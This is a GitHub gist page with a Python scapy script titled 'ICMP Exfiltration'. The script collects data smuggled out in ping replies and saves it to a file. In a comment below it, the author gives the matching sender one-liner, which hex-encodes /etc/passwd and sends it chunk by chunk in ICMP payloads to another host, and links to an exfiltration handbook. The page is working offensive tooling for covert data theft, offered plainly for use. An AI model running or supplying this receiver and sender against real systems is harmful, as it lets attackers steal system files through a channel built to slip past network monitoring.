Skip to content

Instantly share code, notes, and snippets.

@maxrodrigo

maxrodrigo/icmp_exfiltration.py

Created October 7, 2020 15:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save maxrodrigo/a7a8c4bd7dfe64eb305b4c70dee70233 to your computer and use it in GitHub Desktop.
Save maxrodrigo/a7a8c4bd7dfe64eb305b4c70dee70233 to your computer and use it in GitHub Desktop.
Download ZIP
ICMP Exfiltration
Raw
icmp_exfiltration.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP
def process_packet(packet):
if packet.haslayer(ICMP) and packet[ICMP].type == 0:
data = packet[ICMP].load[-8:]
try:
print(f"{data.decode('utf-8')}", end="")
except UnicodeDecodeError:
pass
with open("./exfil", "a+b") as f:
f.write(data)
if __name__ == "__main__":
sniff(iface="wlp3s0", prn=process_packet)
@maxrodrigo
Copy link
Author

ICMP Exfiltration Receiver

Sender:

xxd -p -c 8 /etc/passwd | while read h; do ping -c 1 -p $h 10.0.0.3; done

More in: https://0xffsec.com/handbook/exfiltration/#icmp

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment